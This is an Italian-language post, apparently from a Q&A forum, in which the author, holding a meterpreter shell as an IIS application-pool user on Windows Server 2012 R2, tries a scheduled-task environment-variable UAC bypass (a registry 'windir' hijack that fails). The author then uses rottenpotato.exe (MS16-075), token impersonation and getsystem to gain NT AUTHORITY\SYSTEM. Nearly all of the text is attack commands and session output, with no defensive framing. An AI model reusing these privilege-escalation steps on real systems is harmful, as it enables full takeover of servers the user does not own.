Sto tentando di scalare i privilegi da un utente ISS su Windows Server 2012 R2 sfruttando le variabili di ambiente nelle attività pianificate per il bypass UAC, come il seguente link spiega l'exploit:
Breve storia: L'articolo spiega che come CU, un utente malintenzionato può ignorare il percorso di un'attività già pianificata con "RunLevel: il più alto" (privilegi più alti) con un altro percorso.
Purtroppo per me:
meterpreter > shell
Process 11056 created.
Channel 26 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
d:\UploadFolder>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
ERROR: Access is denied.
d:\UploadFolder>
Ma:
d:\UploadFolder>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\DiskCleanup\SilentCleanup".
C'è un modo per aggirare l'errore "ERRORE: accesso negato". per HKCU?
Modifica successiva:
Sono stato in grado di utilizzare rottenpotato.exe (exploit payload per MS16-075) per ottenere NT AUTHORITY \ SYSTEM sul sistema. Quindi posso utilizzare una vulnerabilità dal 2016 ma non posso utilizzare una vulnerabilità dal 2017 a causa di "ERRORE: accesso negato".
meterpreter > execute -f rottenpotato.exe -Hc
Process 6960 created.
Channel 1 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
IIS APPPOOL\BOX
Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "NT AUTHORITY\System"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Successivamente Modifica 2:
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Ho provato quindi a sfruttare le variabili di ambiente nelle attività pianificate per UAC Bypass mentre NT AUTHORITY \ SYSTEM, dopo un po '(5 minuti) una nuova shell meterpreter è saltata fuori e:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpr
getprivs getproxy
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeRelabelPrivilege
SeChangeNotifyPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeSystemEnvironmentPrivilege
SeCreatePagefilePrivilege
SeManageVolumePrivilege
SeCreatePermanentPrivilege
SeSecurityPrivilege
SeCreateSymbolicLinkPrivilege
SeSystemtimePrivilege
SeCreateTokenPrivilege
SeTrustedCredManAccessPrivilege
SeDebugPrivilege
SeProfileSingleProcessPrivilege
SeImpersonatePrivilege
SeRestorePrivilege
SeIncreaseBasePriorityPrivilege
SeShutdownPrivilege
SeIncreaseQuotaPrivilege
SeSystemProfilePrivilege
SeIncreaseWorkingSetPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeTimeZonePrivilege
SeLockMemoryPrivilege
SeUndockPrivilege
meterpreter >